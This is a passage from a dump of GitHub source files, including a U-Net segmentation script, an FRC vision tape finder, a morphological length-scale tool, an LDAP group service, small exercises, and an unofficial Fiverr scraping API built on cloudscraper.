n_class=2)\nST = image_util.ImageDataProvider(\"test2/ST/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\n# data_provider = image_util.ImageDataProvider(\"Tissue_images/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\n#data_provider = image_util.ImageDataProvider(\"Kumar_aug/aug/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\ndata_provider = image_util.ImageDataProvider(\"tissue_aug/train/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\noutput_path=\"model_f8_0.88_dice_100\"\n#setup & training\nnet = unet.Unet(layers=4, features_root=8, channels=3, n_class=2,cost=\"dice_coefficient\")\ntrainer = unet.Trainer(net,batch_size=4,verification_batch_size=4,optimizer=\"adam\")\npath = trainer.train(data_provider, output_path,keep_prob=0.88,block_size=7,training_iters=64, epochs=100,display_step=2,restore=False)\ntest_x, test_y = DT(6)\nprediction = net.predict(path, test_x)\nerror=unet.error_rate(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"DT error:\",error)\nf1=unet.f1score2(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"DTf1:\",f1)\nimg = util.combine_img_prediction(test_x, test_y, prediction)\nutil.save_image(img, \"DTtest.jpg\")\ntest_x, test_y = ST(8)\nprediction = net.predict(path, test_x)\nerror=unet.error_rate(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"ST error:\",error)\nf1=unet.f1score2(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"STf1:\",f1)\nimg = util.combine_img_prediction(test_x, test_y, prediction)\nutil.save_image(img, 
\"STtest.jpg\")","repo_name":"clguo/SD_Unet_Tensorflow","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24359323218","text":"from rest_framework import serializers\n\nfrom plants.models import Plant, Species, Watering\n\n\nclass SpeciesSerializer(serializers.ModelSerializer):\n lighting = serializers.StringRelatedField()\n\n class Meta:\n model = Species\n fields = ['days_between_watering_min', 'days_between_watering_max', 'lighting',\n 'fertilize_frequency', 'fertilizer']\n\n\nclass WateringSerializer(serializers.ModelSerializer):\n class Meta:\n model = Watering\n fields = ['date', 'fertilized']\n\n\nclass PlantListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Plant\n fields = ['id', 'name', 'latest_watering_date',\n 'next_watering_min', 'next_watering_max',\n 'days_till_next_watering_min', 'days_till_next_watering_max',\n 'time_till_next_watering']\n\n\nclass PlantViewSerializer(serializers.ModelSerializer):\n species = SpeciesSerializer()\n watered = WateringSerializer(many=True)\n spot = serializers.StringRelatedField()\n\n class Meta:\n model = Plant\n fields = ['id', 'species', 'watered', 'name', 'spot', 'latest_watering_date',\n 'next_watering_min', 'next_watering_max',\n 'days_till_next_watering_min', 'days_till_next_watering_max',\n 'time_till_next_watering']\n","repo_name":"erkarp/comics-scrape","sub_path":"plants/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29996438760","text":"from enum import Enum\nimport cv2\nimport libcamera\nimport msgpack\nimport numpy as np\n\nfrom cscore import CameraServer\nfrom ntcore import NetworkTableInstance\nfrom picamera2 import Picamera2\nfrom pupil_apriltags import Detector\nimport math\n \nclass RetroFinder:\n\n def __init__(self, topic_name, camera_params, hsv_lower, hsv_higher):\n self.hsv_lower = hsv_lower\n self.hsv_higher = hsv_higher\n self.scale_factor = 641\n self.width = camera_params[0]\n self.height = camera_params[1]\n self.tape_height = .105\n self.theta = 0\n self.topic_name = topic_name\n self.initialize_nt()\n self.output_stream = CameraServer.putVideo(\"Processed\", self.width, self.height)\n\n def initialize_nt(self):\n \"\"\"Start NetworkTables with Rio as server, set up publisher.\"\"\"\n inst = NetworkTableInstance.getDefault()\n inst.startClient4(\"retro-finder\")\n # this is always the RIO IP address; set a matching static IP on your\n # laptop if you're using this in simulation.\n inst.setServer(\"10.1.0.2\")\n # Table for vision output information\n self.vision_nt = inst.getTable(\"RetroVision\")\n self.vision_nt_msgpack = self.vision_nt.getRawTopic(self.topic_name).publish(\n \"msgpack\"\n )\n\n def find(self, img):\n green_range = cv2.inRange(img, self.hsv_lower, self.hsv_higher)\n img_rgb = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n floodfill = green_range.copy()\n h, w = green_range.shape[:2]\n mask = np.zeros((h+2, w+2), np.uint8)\n cv2.floodFill(floodfill, mask, (0,0), 255)\n floodfill_inv = cv2.bitwise_not(floodfill)\n img_floodfill = green_range | floodfill_inv\n median = cv2.medianBlur(img_floodfill, 5)\n \n contours, hierarchy = cv2.findContours(\n median, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n tapes = {}\n tapes[\"tapes\"] = []\n for c in contours:\n _, _, cnt_width, cnt_height = 
cv2.boundingRect(c)\n if (cnt_height < 50):\n continue\n if (cnt_height/cnt_width < 2):\n continue\n if (cnt_height/cnt_width > 5):\n continue\n mmnts = cv2.moments(c)\n \n if (mmnts[\"m00\"] == 0):\n continue\n cX = int(mmnts[\"m10\"] / mmnts[\"m00\"])\n cY = int(mmnts[\"m01\"] / mmnts[\"m00\"])\n\n translation_x = (cX-self.width/2)* \\\n (self.tape_height*math.cos(self.theta)/cnt_height)\n translation_y = (cY-self.height/2) * \\\n (self.tape_height*math.cos(self.theta)/cnt_height)\n translation_z = (self.tape_height*self.scale_factor*math.cos(self.theta))/(cnt_height)\n\n tape = [translation_x, translation_y, translation_z]\n wpi_t = [tape[2], -tape[0], -tape[1]]\n tapes[\"tapes\"].append(\n {\n \"pose_t\": wpi_t\n }\n )\n self.draw_result(img_rgb, c, cX, cY, wpi_t)\n self.output_stream.putFrame(img_rgb)\n return tapes\n\n def draw_result(self, img, cnt, cX, cY, wpi_t):\n wpi_tb = np.array(wpi_t)\n float_formatter = {\"float_kind\": lambda x: f\"{x:4.1f}\"}\n cv2.drawContours(img, [cnt], -1, (0, 255, 0), 2)\n cv2.circle(img, (int(cX), int(cY)), 7, (0, 0, 0), -1)\n cv2.putText(img, f\"t: {np.array2string(wpi_tb.flatten(), formatter=float_formatter)}\", (int(cX) - 20, int(cY) - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n def analyze(self, request):\n buffer = request.make_array(\"lores\")\n # img = np.frombuffer(buffer, dtype=np.uint8)\n img = buffer\n # print(buffer.shape)\n # img = img.reshape((self.height, self.width))\n img_bgr = cv2.cvtColor(img, cv2.COLOR_YUV420p2BGR)\n img_bgr = img_bgr[176:426,:,:]\n img_hsv = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV)\n img_hsv = np.ascontiguousarray(img_hsv)\n tapes = self.find(img_hsv)\n posebytes = msgpack.packb(tapes)\n\n self.vision_nt_msgpack.set(posebytes)\n\ndef main():\n print(\"main\")\n fullwidth = 1664\n fullheight = 1232\n width = 832\n height = 616\n # option 3: tiny, trade speed for detection distance; two circles, three squraes, ~40ms\n # width=448\n # height=308\n # fast path\n # width=640\n # height=480\n # medium crop\n # width=1920\n # height=1080\n\n camera = Picamera2()\n camera_config = camera.create_still_configuration(\n # one buffer to write, one to read, one in between so we don't have to wait\n buffer_count=6,\n main={\n \"format\": \"YUV420\",\n \"size\": (fullwidth, fullheight),\n },\n lores={\"format\": \"YUV420\", \"size\": (width, height)},\n controls={\n \"FrameDurationLimits\": (5000, 33333), # 41 fps\n # noise reduction takes time\n \"NoiseReductionMode\": libcamera.controls.draft.NoiseReductionModeEnum.Off,\n \"AwbEnable\": False,\n \"AeEnable\": False,\n #\"AeEnable\": True, # for testing\n #\"AnalogueGain\": 4.0\n },\n)\n camera_config[\"transform\"] = libcamera.Transform(hflip=1, vflip=1)\n print(\"REQUESTED\")\n print(camera_config)\n camera.align_configuration(camera_config)\n print(\"ALIGNED\")\n print(camera_config)\n camera.configure(camera_config)\n print(camera.camera_controls)\n\n # Roborio IP: 10.1.0.2\n # Pi IP: 10.1.0.11\n camera_params = [width, 250]\n topic_name = \"tapes\"\n output = RetroFinder(topic_name, camera_params, (20, 250, 100), (60, 255, 255))\n\n camera.start()\n try:\n while True:\n request = camera.capture_request()\n try:\n output.analyze(request)\n finally:\n request.release()\n finally:\n camera.stop()\nmain()\n","repo_name":"Team100/main2023","sub_path":"vision/retro_finder.py","file_name":"retro_finder.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} 
+{"seq_id":"24429039911","text":"import numpy as np\nimport cv2 as cv\n\ndef ruler_initialize(arr,phys_size,margin_size):\n phys_size = np.array(phys_size)[np.squeeze(np.array(phys_size)).nonzero()] # physical size\n assert np.squeeze(arr).ndim == len(phys_size), 'Input array and physical size must match.'\n assert np.squeeze(arr).ndim == 2, 'Only 2d patterns are accepted.'\n\n '''\n Users sometimes need to discard certain marginal regions, the withds of which are specified by margin_size.\n The first pair of elements correspond to the first dimension, the second pair of elements correspond to the second dimension,\n and the third pair of elements, if there are, correspond to the third dimension.\n '''\n margin_size = np.reshape(margin_size,(-1,2))\n return phys_size, margin_size\n\ndef minimum_length(arr,phys_size,margin_size=np.zeros((3,2)),threshold=0.5,len_arr=None):\n '''\n Compute the minimum length scale in a design pattern. The design pattern is arr.\n The physical size is phys_size. The size of borders that need to be discarded is margin_size.\n The binary values of pixels are thresholded by threshold.\n '''\n\n phys_size, margin_size = ruler_initialize(arr,phys_size,margin_size)\n dims = len(phys_size) # dimension, should be 2 or 3\n arr = binarize(arr,threshold)\n margin_number = margin(arr,phys_size,margin_size)\n pixel_size = get_pixel_size(arr,phys_size)\n\n if np.array(len_arr).any(): # search the minimum length scale within a length array \"len_arr\"\n diameter_list = sorted(list(np.abs(len_arr)/2))\n for diameter in diameter_list:\n kernel = get_structuring_element(diameter,pixel_size)\n # difference between open and close\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n\n # number of interior pixels\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in>0:\n return diameter\n\n print(\"The minimum length scale is not in this array of lengths.\")\n return\n\n else: # find the minimum length scale via binary search if \"len_arr\" is not provided\n diameter = min(phys_size) # maximum meaningful filter radius\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr,cv.MORPH_CLOSE,kernel).astype(np.int8))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims) \n\n if pixel_in>0:\n diameters = [0,diameter/2,diameter]\n while abs(diameters[0]-diameters[2])>min(pixel_size):\n diameter = diameters[1]\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in==0: diameters[0],diameters[1] = diameter,(diameter+diameters[2])/2 # radius is too small\n else: diameters[1],diameters[2] = (diameter+diameters[0])/2,diameter # radius is still large\n\n return diameters[0]\n\n else: # min(phys_size) is not a good starting diameter of the binary search\n diameter_initial,pixel_in_initial = diameter/1.5,0 # decrease the diameter\n # search a starting radius until interior pixels emerge or the diameter is unacceptably small\n while pixel_in_initial==0 and diameter_initial>min(pixel_size):\n diameter_initial /= 1.5\n kernel = get_structuring_element(diameter_initial,pixel_size)\n diff_image_initial = \\\n 
abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n pixel_in_initial = interior_pixel_count(diff_image_initial,margin_number,dims)\n\n if pixel_in_initial>0: # start the binary search\n diameters = [0,diameter/2,diameter]\n while abs(diameters[0]-diameters[2])>min(pixel_size):\n diameter = diameters[1]\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in==0: diameters[0],diameters[1] = diameter,(diameter+diameters[2])/2 # radius is too small\n else: diameters[1],diameters[2] = (diameter+diameters[0])/2,diameter # radius is still large\n return diameters[0]\n\n else: # pixel_in_initial==0, fail to find a starting radius\n print(\"The minimum length scale is at least \", min(pixel_size))\n return\n\ndef get_structuring_element(diameter,pixel_size):\n se_shape = np.array(np.round(diameter/pixel_size),dtype=int)\n rounded_size = np.round(diameter/pixel_size)*pixel_size\n if se_shape[0]==0: x_tick = [0]\n else: x_tick = np.linspace(-rounded_size[0]/2,rounded_size[0]/2,se_shape[0])\n if se_shape[1]==0: y_tick = [0]\n else: y_tick = np.linspace(-rounded_size[1]/2,rounded_size[1]/2,se_shape[1])\n\n if len(pixel_size) == 2:\n X, Y = np.meshgrid(x_tick, y_tick, sparse=True, indexing='ij') # grid over the entire design region\n structuring_element = X**2+Y**2 <= diameter**2/4\n else:\n raise AssertionError(\"Function for this dimension is not implemented!\")\n\n return np.array(structuring_element,dtype=np.uint8)\n\ndef margin(arr,phys_size,margin_size):\n # compute the numbers of pixels corresponding to the marginal widths\n\n arr = np.squeeze(arr)\n margin_number = margin_size[0,:]/phys_size[0]*arr.shape[0]\n\n for dim_idx in range(1,len(phys_size)):\n margin_number = np.vstack((margin_number,margin_size[dim_idx,:]/phys_size[dim_idx]*arr.shape[dim_idx]))\n margin_number = np.round(margin_number).astype(int) # numbers of pixels of marginal regions\n\n assert (margin_number>=0).all(), 'Margin widths should be nonnegative!'\n assert (np.array(arr.shape)-np.sum(margin_number,axis=1)>=3).all(), 'Too wide margin or too narrow design region!'\n\n for ii in range(margin_number.shape[0]):\n for jj in range(margin_number.shape[1]):\n if margin_number[ii,jj]==0:\n margin_number[ii,jj] = 1 # minimum possible margin_number\n\n return margin_number\n\ndef get_pixel_size(arr,phys_size):\n squeeze_shape = np.array(np.squeeze(arr).shape)\n return phys_size/squeeze_shape # sizes of a pixel along all finite-thickness directions\n\ndef binarize(arr,demarcation=0.5):\n arr_normalized = (arr-min(arr.flatten()))/(max(arr.flatten())-min(arr.flatten())) # normalize the data of the array\n arr_binarized = np.sign(arr_normalized-demarcation)/2+0.5 # binarize the data of the array with the threshold demarcation=0.5\n return np.array(arr_binarized,dtype=np.uint8)\n\ndef guarantee_2or3d(arr):\n arr = np.squeeze(arr)\n if arr.ndim == 2 or arr.ndim == 3:\n arr_out = arr\n elif arr.ndim == 1:\n arr_out = np.expand_dims(arr, axis=(1, 2)) \n elif arr.ndim == 0:\n arr_out = np.expand_dims(arr, axis=(0, 1, 2)) \n else:\n raise AssertionError(\"Too many dimensions!\")\n return arr_out\n\ndef interior_pixel_count(arr,margin_number=np.ones((2,2),dtype=int),dims=2):\n # return the number of interior pixels with nonzero values\n\n pixel_int = 0 # initialize before counting\n arr = 
np.squeeze(arr)\n row_begin, row_end = margin_number[0,0], arr.shape[0]-margin_number[0,1]\n column_begin,column_end = margin_number[1,0], arr.shape[1]-margin_number[1,1]\n\n if dims==2:\n selector = arr[row_begin:row_end,column_begin:column_end] * \\\n arr[row_begin-1:row_end-1,column_begin:column_end] * arr[row_begin+1:row_end+1,column_begin:column_end] * \\\n arr[row_begin:row_end,column_begin-1:column_end-1] * arr[row_begin:row_end,column_begin+1:column_end+1]\n\n else:\n raise AssertionError(\"Function for this dimension is not implemented!\")\n\n return np.sum(selector)\n","repo_name":"mawc2019/ruler","sub_path":"ruler_cv_1119.py","file_name":"ruler_cv_1119.py","file_ext":"py","file_size_in_byte":8373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14135867993","text":"import copy\nimport warnings\n\nfrom mapreduce.lib.graphy import common\n\n\nclass LineStyle(object):\n\n \"\"\"Represents the style for a line on a line chart. Also provides some\n convenient presets.\n\n Object attributes (Passed directly to the Google Chart API. Check there for\n details):\n width: Width of the line\n on: Length of a line segment (for dashed/dotted lines)\n off: Length of a break (for dashed/dotted lines)\n color: Color of the line. A hex string, like 'ff0000' for red. Optional,\n AutoColor will fill this in for you automatically if empty.\n\n Some common styles, such as LineStyle.dashed, are available:\n solid\n dashed\n dotted\n thick_solid\n thick_dashed\n thick_dotted\n \"\"\"\n\n # Widths\n THIN = 1\n THICK = 2\n\n # Patterns\n # ((on, off) tuples, as passed to LineChart.AddLine)\n SOLID = (1, 0)\n DASHED = (8, 4)\n DOTTED = (2, 4)\n\n def __init__(self, width, on, off, color=None):\n \"\"\"Construct a LineStyle. See class docstring for details on args.\"\"\"\n self.width = width\n self.on = on\n self.off = off\n self.color = color\n\n\nLineStyle.solid = LineStyle(1, 1, 0)\nLineStyle.dashed = LineStyle(1, 8, 4)\nLineStyle.dotted = LineStyle(1, 2, 4)\nLineStyle.thick_solid = LineStyle(2, 1, 0)\nLineStyle.thick_dashed = LineStyle(2, 8, 4)\nLineStyle.thick_dotted = LineStyle(2, 2, 4)\n\n\nclass LineChart(common.BaseChart):\n\n \"\"\"Represents a line chart.\"\"\"\n\n def __init__(self, points=None):\n super(LineChart, self).__init__()\n if points is not None:\n self.AddLine(points)\n\n def AddLine(self, points, label=None, color=None,\n pattern=LineStyle.SOLID, width=LineStyle.THIN, markers=None):\n \"\"\"Add a new line to the chart.\n\n This is a convenience method which constructs the DataSeries and appends it\n for you. It returns the new series.\n\n points: List of equally-spaced y-values for the line\n label: Name of the line (used for the legend)\n color: Hex string, like 'ff0000' for red\n pattern: Tuple for (length of segment, length of gap). i.e.\n LineStyle.DASHED\n width: Width of the line (i.e. LineStyle.THIN)\n markers: List of Marker objects to attach to this line (see DataSeries\n for more info)\n \"\"\"\n if color is not None and isinstance(color[0], common.Marker):\n warnings.warn('Your code may be broken! '\n 'You passed a list of Markers instead of a color. 
The '\n 'old argument order (markers before color) is deprecated.',\n DeprecationWarning, stacklevel=2)\n style = LineStyle(width, pattern[0], pattern[1], color=color)\n series = common.DataSeries(points, label=label, style=style,\n markers=markers)\n self.data.append(series)\n return series\n\n def AddSeries(self, points, color=None, style=LineStyle.solid, markers=None,\n label=None):\n \"\"\"DEPRECATED\"\"\"\n warnings.warn('LineChart.AddSeries is deprecated. Call AddLine instead. ',\n DeprecationWarning, stacklevel=2)\n return self.AddLine(points, color=color, width=style.width,\n pattern=(style.on, style.off), markers=markers,\n label=label)\n\n\nclass Sparkline(LineChart):\n \"\"\"Represent a sparkline. These behave like LineCharts,\n mostly, but come without axes.\n \"\"\"\n","repo_name":"livid/v2ex-gae","sub_path":"mapreduce/lib/graphy/line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} +{"seq_id":"32921692712","text":"# -*- coding: utf-8 -*-\n\nfrom .base import Service, ACTIVE_DIRECTORY\nfrom redap.exceptions import RedapError\nfrom redap.settings import group_schema\n\n\nclass GroupService(Service):\n __model__ = group_schema.ldap_model\n __config__ = group_schema.data\n\n @property\n def _users(self):\n from redap.services import users\n return users\n\n def get_members(self, group_id, include_nested=False, **kwargs):\n group_dn = self.get_one(group_id).dn\n\n if str(include_nested).lower() in [str(1), 'true']:\n self._raise_if_incompatible_with(ACTIVE_DIRECTORY)\n kwargs['filter'] = '(memberOf:1.2.840.113556.1.4.1941:={0})'.format(group_dn)\n else:\n kwargs['filter'] = '(memberOf={0})'.format(group_dn)\n\n return self._users.get_many(**kwargs)\n\n def add_member(self, group_id, payload):\n user = self._users.get_one(payload['id'])\n group = self.get_one(group_id)\n if self._users.is_member_of(user.id, group.dn):\n msg = \"User {0} is already member of {1}\".format(user.id, group_id)\n raise RedapError(msg, status_code=400)\n\n self._microsoft_ext.add_members_to_groups([user.dn], [group.dn], payload.pop('fix', False))\n\n def remove_member(self, group_id, user_id):\n user = self._users.get_one(user_id)\n group = self.get_one(group_id)\n if not self._users.is_member_of(user_id, group.dn):\n msg = \"User {0} is not a member of {1}\".format(user_id, group_id)\n raise RedapError(msg, status_code=400)\n\n self._microsoft_ext.remove_members_from_groups([user.dn], [group.dn], fix=False)\n","repo_name":"rbw/redap","sub_path":"redap/services/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"20350959604","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n N = int(input().strip())\n k = int(input().strip())\n # temp = []\n # for i in range(1, N+1):\n # for j in range(1, N+1):\n # print(i*j, end=' ')\n # temp.append(i*j)\n # print()\n # print()\n # temp.sort()\n # print(temp[k-1])\n start = 1\n end = k\n result = 0\n while (end - start) >= 0:\n mid = (start + end)//2\n cnt = 0\n for i in range(1, N+1):\n cnt += min(mid//i, N)\n # print(start, end, cnt)\n if cnt >= k:\n result = mid\n end = mid - 1\n else:\n start = mid + 1\n 
print(result)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/1300/1300.py","file_name":"1300.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22047112162","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom pygraph import line\nfrom pygraph import util\n\ng = util.mkGraph((80, 60))\nends = [\n (20, 10), (20, -10),\n (10, 20), (10, -20), \n (-10, 20), (-10, -20), \n (-20, 10), (-20, -10)\n]\n\ntends = [(x[0] + 40, x[1] + 30) for x in ends]\n\nfor end in tends:\n line.mkLine(g, (40, 30), end)\n \nline.mkLine(g, (10, 20), (60, 50))\n\nutil.saveG(\"line.png\", util.enLarge(g))","repo_name":"emliunix/pygraph","sub_path":"script_line.py","file_name":"script_line.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38149487173","text":"\r\ndef solution(S):\r\n if len(S)%2 == 0:\r\n return -1\r\n mid = len(S)//2\r\n start = 0\r\n end = -1\r\n while start < mid:\r\n if S[start] != S[end]:\r\n return -1\r\n start += 1 \r\n end -= 1\r\n print(mid)\r\n return mid\r\n\r\nsolution('racecar') ","repo_name":"edwinmesa/dt_learn_data_science","sub_path":"python/StrSymmetryPoint.PY","file_name":"StrSymmetryPoint.PY","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73152104167","text":"from bs4 import BeautifulSoup\nimport pdb\n\n\nf = open('tempfile', 'r')\ndata = f.read()\n#pdb.set_trace()\nsoup = BeautifulSoup(data, \"html.parser\")\n\ntags = soup.findAll('li', { \"class\" : \"grid-tile\" })\n#pdb.set_trace()\nfor tag in tags:\n\n\t#print(tag)\n\n\t#IMAGE\n\timg_url = tag.find('a', { \"class\" : \"thumb-link\" } ).img['src']\n\t#print(img_url)\n\t#NAME AND URL\n\tname_and_url = tag.find('a', { \"class\" : \"name-link\" } )\n\t\t#NAME\n\t#print(name_and_url.string.strip())\n\t\t#URL\n\t#print(name_and_url['href'])\n\t#pdb.set_trace()\n\tprices = tag.find('div', { \"class\": \"product-pricing\" })\n\t#This only happens if there's sales/promos\n\tif prices.div != None:\n\t\tspans = prices.div.findAll('span')\n\t\tfor span in spans:\n\n\t\t\t#REGULAR PRICE\n\t\t\tif span['class'][0] == 'product-standard-price':\n\t\t\t\tif span.string:\n\t\t\t\t\tprint(span.string.strip())\n\t\t\t\n\t\t\t#SALE PRICE\n\t\t\telif span['class'][0] == 'product-sales-price':\n\t\t\t\tif span.string:\n\t\t\t\t\tprint(span.string.strip())\n\n\t#Otherwise no sale/promo just take the inner price\n\telse:\n\t\tif prices.string:\n\t\t\tprint(prices.string.strip())\n\t#print(prices)","repo_name":"jpaprakis/shop-scraper","sub_path":"test-soup.py","file_name":"test-soup.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23758323382","text":"\"\"\"\nUnofficial Fiverr API helps you to get:\n\n* Seller Details\n* Seller Gigs\n* Seller Orders\n* Seller Transactions\n* Seller Reviews\n * Group by buyers\n * Filter by Impression\n * Sort by time\n * Limit no. 
of reviews\n\"\"\"\n\nfrom typing import Union\nfrom enum import Enum\nimport json\nfrom cloudscraper.exceptions import CloudflareChallengeError\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.security import HTTPBearer\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom bs4 import BeautifulSoup\nimport requests\nimport cloudscraper\n\nDESCRIPTION = __doc__ or \"\"\ntags_metadata = [\n {\"name\": \"Home\"},\n {\"name\": \"Seller Details\", \"description\": \"Get details about seller\"},\n]\n\nURL = \"https://www.fiverr.com\"\nbearer_description = f\"\"\"\n### Steps to obtain authorization token from Fiverr:\n- Login into your [Fiverr account]({URL})\n- Open Network Tab of browser\n- Select any `HTML` or `XHR` request\n- Go to `Cookies` tab\n- Use `hodor_creds` as authorization token\n\n> I DO NOT store your credentials. You can verify that by viewing source code [here](https://www.github.com/salmannotkhan/fiverr-api)\n\"\"\"\n\nbearer = HTTPBearer(auto_error=True, description=bearer_description)\n\napp = FastAPI(\n title=\"Unofficial Fiverr API\",\n description=DESCRIPTION,\n version=\"1.2\",\n contact={\n \"name\": \"Salman Shaikh\",\n \"url\": \"https://salmannotkhan.github.io/\",\n \"email\": \"tony903212@gmail.com\",\n },\n openapi_tags=tags_metadata,\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"GET\"],\n allow_headers=[\"*\"],\n)\n\n\nclass FilterBy(str, Enum):\n \"\"\"\n Filter by Enum Class\n \"\"\"\n\n POSITIVE = \"positive\"\n NEGATIVE = \"negative\"\n\n\nclass SortBy(str, Enum):\n \"\"\"\n Sort by Enum Class\n \"\"\"\n\n RECENT = \"recent\"\n RELEVANT = \"relevant\"\n\n\ncommon_headers = {\n \"User-Agent\": \"Mozilla Firefox\",\n \"Accept\": \"application/json\",\n \"Accept-Language\": \"en-US,en;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n}\n\ndef get_user_data(username: str):\n \"\"\"\n Get basic seller details and CSRF Token\n \"\"\"\n scraper = cloudscraper.create_scraper()\n seller_url = f\"{URL}/{username}\"\n data = scraper.get(seller_url)\n soup = BeautifulSoup(data.text, \"lxml\")\n seller_data = json.loads(\n soup.find(\"script\", id=\"perseus-initial-props\").string or \"null\"\n )\n seller_data[\"csrfToken\"] = soup.find(\"meta\", {\"property\": \"csrfToken\"}).get(\n \"content\"\n )\n return scraper.cookies, seller_data\n\n\n@app.get(\"/\", tags=[\"Home\"])\nasync def index():\n \"\"\"\n Home Path for API\n \"\"\"\n return {\n \"Welcome to\": \"Unofficial Fiverr API\",\n \"For docs\": \"Visit /docs\",\n \"For redocs\": \"Visit /redoc\",\n }\n\n\n@app.get(\"/transaction\", tags=[\"Seller Details\"])\nasync def get_transactions(after: Union[str, None] = None, token=Depends(bearer)):\n \"\"\"\n Use `endCursor` as `after` for pagination\n \"\"\"\n scraper = cloudscraper.create_scraper()\n url = f\"{URL}/perseus/financial-dashboard/api/earnings/transactions\"\n cookies = {\"hodor_creds\": token.credentials}\n while True:\n try:\n res = scraper.get(\n url,\n headers=common_headers,\n cookies=cookies,\n allow_redirects=False,\n params={\"after\": after},\n )\n break\n except CloudflareChallengeError:\n pass\n data = res.json()\n data[\"data\"][\"transactions\"] = list(\n map(\n lambda x: {**x, \"amount\": (x[\"amount\"] / 100)}, data[\"data\"][\"transactions\"]\n )\n )\n return data\n\n\n@app.get(\"/{username}\", 
tags=[\"Seller Details\"])\nasync def get_seller_details(username: str):\n \"\"\"\n Remove unnecessary details from seller card and returns it\n \"\"\"\n _, user_data = get_user_data(username)\n seller_card = user_data[\"userData\"][\"seller_card\"]\n seller_profile = user_data[\"userData\"][\"seller_profile\"]\n seller_card.update(seller_profile)\n return seller_card\n\n\n@app.get(\"/{username}/gigs\", tags=[\"Seller Details\"])\nasync def get_gigs(username: str):\n \"\"\"\n Get seller gigs\n \"\"\"\n _, user_data = get_user_data(username)\n return user_data[\"gigs\"][\"gigs\"]\n\n\n@app.get(\"/{username}/reviews\", tags=[\"Seller Details\"])\nasync def get_reviews(\n username: str,\n filter_by: Union[FilterBy, None] = None,\n sort_by: Union[SortBy, None] = None,\n group_by_buyer: bool = False,\n limit: int = 9999,\n):\n \"\"\"\n Get seller reviews\n \"\"\"\n session = requests.session()\n cookies, user_data = get_user_data(username)\n session.cookies = cookies\n url = f\"{URL}/reviews/user_page/fetch_user_reviews/{user_data['userData']['user']['id']}\"\n\n # Adding CSRF Token\n common_headers[\"X-CSRF-Token\"] = user_data[\"csrfToken\"]\n common_headers[\"Referer\"] = f\"https://www.fiverr.com/{username}\"\n # Setting up payload\n payload: dict[str, str] = {}\n payload[\"user_id\"] = user_data[\"userData\"][\"user\"][\"id\"]\n if filter_by:\n payload[\"filter_by\"] = 